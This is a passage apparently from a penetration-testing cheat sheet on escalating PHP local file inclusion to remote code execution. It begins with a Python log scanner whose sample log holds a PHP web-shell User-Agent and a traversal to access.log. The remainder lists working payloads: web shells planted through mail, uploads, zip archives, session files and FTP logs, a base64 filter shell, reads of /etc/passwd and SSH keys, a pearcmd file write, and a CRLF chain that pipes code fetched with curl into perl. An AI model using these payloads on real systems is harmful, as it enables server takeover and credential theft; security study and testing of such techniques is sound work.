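    """Dict of fields for an Apache/Nginx combined-format line, else None."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def harvest_get_tokens(lines):
    """(client ip, parameter, value) for each GET whose query carries a token."""
    found = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "GET":
            continue
        query = urlsplit(rec["target"]).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key.lower() in TOKEN_KEYS and value:
                found.append((rec["ip"], key, value))
    return found


def poisoning_attempts(lines):
    """(client ip, target, reasons) for lines that plant a PHP tag in any
    logged field or traverse towards a log file."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        decoded_target = unquote(rec["target"])
        reasons = []
        if any(PHP_TAG.search(f) for f in (decoded_target, rec["ua"], rec["referer"])):
            reasons.append("php-tag")
        if TRAVERSAL.search(rec["target"]) and "log" in deco_lower(decoded_target):
            reasons.append("log-include")
        if reasons:
            hits.append((rec["ip"], rec["target"], reasons))
    return hits


def deco_lower(text):
    """Lower-case helper kept separate so the rule above reads as one line."""
    return text.lower()


# Constructed sample: a token leaked via GET, a poisoned User-Agent, the
# follow-up include of the access log, and an unrelated POST.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /portalhome/?AuthenticationToken=c3f1a9e0 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "<?php system($_GET[\'c\']); ?>"',
    '10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /index.php?page=..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1" 200 70000 "-" "curl/8.0"',
    '10.0.0.7 - - [12/Mar/2024:10:02:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("tokens:", harvest_get_tokens(SAMPLE_LOG))
    print("poisoning:", poisoning_attempts(SAMPLE_LOG))
```

On the sample, the first line yields the AuthenticationToken value that a replay would reuse, while the two 10.0.0.9 lines are the poisoning pair: the User-Agent carrying the PHP tag, then the traversal that includes the log. Real log formats escape quotes inside the User-Agent differently per server, which is the same reason the warning above tells you to avoid double quotes in the payload.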
Via Email
Send a mail to an internal account (user@localhost) containing your PHP payload like <?php echo system($_REQUEST["cmd"]); ?> and try to include the mail of the user with a path like /var/mail/<USERNAME> or /var/spool/mail/<USERNAME>
Via /proc/*/fd/*
- Upload a lot of shells (for example: 100)
- Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)
Via /proc/self/environ
Like a log file, send the payload in the User-Agent; it will be reflected inside the /proc/self/environ file
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
Via upload
If you can upload a file, just inject the shell payload in it (e.g. : <?php system($_GET['c']); ?> ).
http://example.com/index.php?page=path/to/uploaded/file.png
In order to keep the file legible it is best to inject into the metadata of the picture/doc/pdf
Via Zip file upload
Upload a ZIP file containing a PHP shell compressed and access:
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
Via PHP sessions
Check if the website uses PHP sessions (PHPSESSID)
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
In PHP these sessions are stored in /var/lib/php5/sess_[PHPSESSID] files (newer Debian/Ubuntu builds use /var/lib/php/sessions/sess_[PHPSESSID])
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
Set the user value (which ends up in the session file) to <?php system('cat /etc/passwd');?>
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
Via ssh
If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa
Via vsftpd logs
The logs for the FTP server vsftpd are located at /var/log/vsftpd.log. In the scenario where a Local File Inclusion (LFI) vulnerability exists and access to an exposed vsftpd server is possible, the following steps can be considered:
- Inject a PHP payload into the username field during the login process.
- After the injection, use the LFI to retrieve the server logs from /var/log/vsftpd.log.
Via php base64 filter (using base64)
As shown in this article, the PHP base64 filter simply ignores non-base64 characters. You can use that to bypass the file extension check: if you supply base64 that ends with ".php", it ignores the "." and appends "php" to the base64 stream. Here is an example payload:
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
Via php filters (no file needed)
This writeup explains that you can use php filters to generate arbitrary content as output. This basically means that you can generate arbitrary php code for the include without needing to write it into a file.
Via segmentation fault
Upload a file that will be stored as temporary in /tmp, then in the same request trigger a segmentation fault; the temporary file won't be deleted and you can search for it.
LFI2RCE via Segmentation Fault
Via Nginx temp file storage
If you found a Local File Inclusion and Nginx is running in front of PHP you might be able to obtain RCE with the following technique:
Via PHP_SESSION_UPLOAD_PROGRESS
If you found a Local File Inclusion, even if you don't have a session and session.auto_start is Off, if you provide PHP_SESSION_UPLOAD_PROGRESS in multipart POST data, PHP will enable the session for you. You could abuse this to get RCE:
LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS
Via temp file uploads in Windows
If you found a Local File Inclusion and the server is running on Windows you might get RCE:
Via pearcmd.php + URL args
As explained in this post, the script /usr/local/lib/php/pearcmd.php exists by default in php docker images. Moreover, it is possible to pass arguments to the script via the URL because it is documented that if a URL param doesn't have an =, it should be used as an argument. See also watchTowr's write-up and Orange Tsai's "Confusion Attacks".
The following request creates a file in /tmp/hello.php with the content <?=phpinfo()?>:
GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
The following abuses a CRLF vuln to get RCE (from here):
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a
Via phpinfo() (file_uploads = on)
If you found a Local File Inclusion and a file exposing phpinfo() with file_uploads = on you can get RCE:
Via compress.zlib + PHP_STREAM_PREFER_STDIO + Path Disclosure
If you found a Local File Inclusion and you can exfiltrate the path of the temp file BUT the server is checking whether the file to be included has PHP marks, you can try to bypass that check with this Race Condition:
LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STDIO + Path Disclosure
Via eternal waiting + bruteforce
If you can abuse the LFI to upload temporary files and make the server hang the PHP execution, you could then brute force filenames for hours to find the temporary file:
To Fatal Error
If you include any of the files /usr/bin/phar, /usr/bin/phar7, /usr/bin/phar.phar7, /usr/bin/phar.phar (you need to include the same one twice to throw that error).
I don't know how this is useful but it might be.
Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted.
References
- PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders
- When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise
- Positive Technologies: Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?